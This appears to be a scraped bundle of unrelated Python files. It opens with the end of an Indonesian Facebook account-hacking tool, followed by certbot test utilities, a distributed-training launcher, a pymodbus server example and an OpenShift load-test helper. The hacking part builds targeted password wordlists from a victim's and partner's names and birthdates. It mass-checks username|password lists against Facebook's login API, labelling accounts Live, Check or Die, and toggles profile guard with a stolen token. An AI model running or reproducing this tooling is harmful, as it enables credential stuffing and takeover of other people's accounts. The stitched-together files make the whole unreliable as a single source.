raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
util.py
|
"""Test utilities.
.. warning:: This module is not part of the public API.
"""
import multiprocessing
import os
import pkg_resources
import shutil
import tempfile
import unittest
import sys
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import mock
import OpenSSL
import josepy as jose
import six
from six.moves import reload_module # pylint: disable=import-error
from certbot import constants
from certbot import interfaces
from certbot import storage
from certbot import util
from certbot import configuration
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def skip_unless(condition, reason): # pragma: no cover
"""Skip tests unless a condition holds.
This implements the basic functionality of unittest.skipUnless
which is only available on Python 2.7+.
:param bool condition: If ``False``, the test will be skipped
:param str reason: the reason for skipping the test
:rtype: callable
:returns: decorator that hides tests unless condition is ``True``
"""
if hasattr(unittest, "skipUnless"):
return unittest.skipUnless(condition, reason)
elif condition:
return lambda cls: cls
else:
return lambda cls: None
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
os.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else set(('freeze',))
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
else:
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
else:
return object.__setattr__(self, name, value)
def _create_get_utility_mock():
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
# pylint: disable=star-args
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Then we have various files which are not correctly closed at the time of tearDown.
# On Windows, it is visible for the same reasons as above.
# For know, we log them until a proper file close handling is written.
def onerror_handler(_, path, excinfo):
"""On error handler"""
message = ('Following error occurred when deleting the tempdir {0}'
' for path {1} during tearDown process: {2}'
.format(self.tempdir, path, str(excinfo)))
warnings.warn(message)
shutil.rmtree(self.tempdir, onerror=onerror_handler)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object.
"""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def lock_and_call(func, lock_path):
"""Grab a lock for lock_path and call func.
:param callable func: object to call after acquiring the lock
:param str lock_path: path to file or directory to lock
"""
# Reload module to reset internal _LOCKS dictionary
reload_module(util)
# start child and wait for it to grab the lock
cv = multiprocessing.Condition()
cv.acquire()
child_args = (cv, lock_path,)
child = multiprocessing.Process(target=hold_lock, args=child_args)
child.start()
cv.wait()
# call func and terminate the child
func()
cv.notify()
cv.release()
child.join()
assert child.exitcode == 0
def hold_lock(cv, lock_path): # pragma: no cover
"""Acquire a file lock at lock_path and wait to release it.
:param multiprocessing.Condition cv: condition for synchronization
:param str lock_path: path to the file lock
"""
from certbot import lock
if os.path.isdir(lock_path):
my_lock = lock.lock_dir(lock_path)
else:
my_lock = lock.LockFile(lock_path)
cv.acquire()
cv.notify()
cv.wait()
my_lock.release()
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def broken_on_windows(function):
"""Decorator to skip temporarily a broken test on Windows."""
reason = 'Test is broken and ignored on windows but should be fixed.'
return unittest.skipIf(
sys.platform == 'win32'
and os.environ.get('SKIP_BROKEN_TESTS_ON_WINDOWS', 'true') == 'true',
reason)(function)
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
main.py
|
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: MIT
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
if __name__ == "__main__":
import torch.multiprocessing as mp
mp.set_start_method('spawn')
import os
os.environ["OMP_NUM_THREADS"] = "1"
import time
from dist_train.utils.experiment_bookend import open_experiment
from dist_train.workers import synchronous_worker
if __name__ == '__main__':
# Interpret the arguments. Load the shared model/optimizer. Fetch the config file.
model, _, config, args = open_experiment(apply_time_machine=True)
print(' ', flush=True)
model.reset()
print(' ', flush=True)
# Create a group of workers
print('Launching the individual workers...', flush=True)
processes = []
for rank in range(args.N):
# The workers perform roll-outs and synchronize gradients
p = mp.Process(target=synchronous_worker, args=(int(rank), config, args))
p.start()
time.sleep(0.25)
processes.append(p)
for p in processes:
p.join()
|
callback-server.py
|
#!/usr/bin/env python
'''
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
'''
#---------------------------------------------------------------------------#
# import the modbus libraries we need
#---------------------------------------------------------------------------#
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
from pymodbus.compat import iterkeys
#---------------------------------------------------------------------------#
# import the python libraries we need
#---------------------------------------------------------------------------#
from multiprocessing import Queue, Process
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
#---------------------------------------------------------------------------#
# create your custom data block with callbacks
#---------------------------------------------------------------------------#
class CallbackDataBlock(ModbusSparseDataBlock):
''' A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
'''
def __init__(self, devices, queue):
'''
'''
self.devices = devices
self.queue = queue
values = {k:0 for k in iterkeys(devices)}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, self).__init__(values)
def setValues(self, address, value):
''' Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
'''
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
#---------------------------------------------------------------------------#
# define your callback process
#---------------------------------------------------------------------------#
def rescale_value(value):
''' Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
'''
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
def device_writer(queue):
''' A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
'''
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
#---------------------------------------------------------------------------#
# initialize your device map
#---------------------------------------------------------------------------#
def read_device_map(path):
''' A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
'''
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
|
utils.py
|
#!/usr/bin/env python
import json, subprocess, time, copy, sys, os, yaml, tempfile, shutil, math, re
from datetime import datetime
from clusterloaderstorage import *
from multiprocessing import Process
from flask import Flask, request
def calc_time(timestr):
tlist = timestr.split()
if tlist[1] == "s":
return int(tlist[0])
elif tlist[1] == "min":
return int(tlist[0]) * 60
elif tlist[1] == "ms":
return int(tlist[0]) / 1000
elif tlist[1] == "hr":
return int(tlist[0]) * 3600
else:
print "Invalid delay in rate_limit\nExitting ........"
sys.exit()
def oc_command(args, globalvars):
tmpfile=tempfile.NamedTemporaryFile()
# see https://github.com/openshift/origin/issues/7063 for details why this is done.
shutil.copyfile(globalvars["kubeconfig"], tmpfile.name)
ret = subprocess.check_output("KUBECONFIG="+tmpfile.name+" "+args, shell=True)
if globalvars["debugoption"]:
print args
if args.find("oc process") == -1:
print ret
tmpfile.close()
return ret
def login(user,passwd,master):
return subprocess.check_output("oc login --insecure-skip-tls-verify=true -u " + user + " -p " + passwd + " " + master,shell=True)
def check_oc_version(globalvars):
major_version = 0;
minor_version = 0;
if globalvars["kubeopt"]:
version_string = oc_command("kubectl version", globalvars)
result = re.search("Client Version: version.Info\{Major:\"(\d+)\", Minor:\"(\d+)\".*", version_string)
if result:
major_version = result.group(1)
minor_version = result.group(2)
else:
version_string = oc_command("oc version", globalvars)
result = re.search("oc v(\d+)\.(\d+)\..*", version_string)
if result:
major_version = result.group(1)
minor_version = result.group(2)
return {"major":major_version, "minor": minor_version}
def get_route():
default_proj = subprocess.check_output("oc project default", shell=True)
localhost = subprocess.check_output("ip addr show eth0 | awk '/inet / {print $2;}' | cut -d/ -f1", shell=True).rstrip()
router_name = subprocess.check_output("oc get pod --no-headers | head -n -1 | awk '/^router-/ {print $1;}'", shell=True).rstrip()
router_ip = subprocess.check_output("oc get pod --template=\"{{{{ .status.podIP }}}}\" {0}".format(router_name), shell=True).rstrip()
spawned_project_list = subprocess.check_output("oc get projects -l purpose=test --no-headers | awk '{print $1;}'", shell=True)
routes_list = []
for project in spawned_project_list.splitlines():
project_routes = subprocess.check_output("oc get routes --no-headers -n {0} | awk '{{ print $2 }}'".format(project), shell=True)
routes_list.extend([y for y in (x.strip() for x in project_routes.splitlines()) if y])
return localhost, router_ip, routes_list
def create_template(templatefile, num, parameters, globalvars):
if globalvars["debugoption"]:
print "create_template function called"
# process parameters flag for oc 3.4 and earlier is -v. Starting in 3.5 it is -p.
if not globalvars["kubeopt"] and (int(globalvars["version_info"]["major"]) <= 3 and int(globalvars["version_info"]["minor"]) <= 4):
parameter_flag = "-v"
else:
parameter_flag = "-p"
if globalvars["autogen"] and parameters:
localhost, router_ip, jmeter_ips = get_route()
extra_param = {}
extra_param['SERVER_RESULTS_DIR'] = os.environ.get('benchmark_run_dir','/tmp/')
gun_env = os.environ.get('GUN')
if gun_env:
extra_param['GUN'] = gun_env
else:
gun_param = any(param for param in parameters if param.get('GUN'))
if not gun_param:
extra_param['GUN'] = localhost
gun_port_env = os.environ.get('GUN_PORT')
if gun_port_env:
extra_param['GUN_PORT'] = gun_port_env
else:
gun_port_set = any(param for param in parameters if param.get('GUN_PORT'))
if not gun_port_set:
extra_param['GUN_PORT'] = 9090
parameters.append(extra_param.copy())
jmeter = any(param for param in parameters if param.get('RUN') == 'jmeter')
if jmeter:
for parameter in parameters:
for key, value in parameter.iteritems():
if key == "JMETER_SIZE":
size = int(value)
num = math.ceil(float(len(jmeter_ips))/size)
globalvars["podnum"] += num
create_wlg_targets("wlg-targets", globalvars)
data = {}
timings = {}
i = 0
while i < int(num):
tmpfile=tempfile.NamedTemporaryFile()
templatejson = copy.deepcopy(data)
cmdstring = "oc process -f %s" % templatefile
if parameters:
for parameter in parameters:
for key, value in parameter.iteritems():
if globalvars["autogen"] and jmeter:
if key == "TARGET_HOST":
value = ":".join(jmeter_ips[(size*i):(size*(i+1))])
elif key == "ROUTER_IP":
value = router_ip
cmdstring += " " + parameter_flag + " %s='%s'" % (key, value)
cmdstring += " " + parameter_flag + " IDENTIFIER=%i" % i
processedstr = oc_command(cmdstring, globalvars)
templatejson = json.loads(processedstr)
json.dump(templatejson, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f "+tmpfile.name + \
" --namespace %s" % globalvars["namespace"], globalvars)
else:
check = oc_command("oc create -f "+ tmpfile.name + \
" --namespace %s" % globalvars["namespace"], globalvars)
if "tuningset" in globalvars:
if "templates" in globalvars["tuningset"]:
templatestuningset = globalvars["tuningset"]["templates"]
if "stepping" in templatestuningset:
stepsize = templatestuningset["stepping"]["stepsize"]
pause = templatestuningset["stepping"]["pause"]
globalvars["totaltemplates"] = globalvars["totaltemplates"] + 1
templates_created = int(globalvars["totaltemplates"])
if templates_created % stepsize == 0:
time.sleep(calc_time(pause))
if "rate_limit" in templatestuningset:
delay = templatestuningset["rate_limit"]["delay"]
time.sleep(calc_time(delay))
i = i + 1
tmpfile.close()
def create_wlg_targets(cm_targets, globalvars):
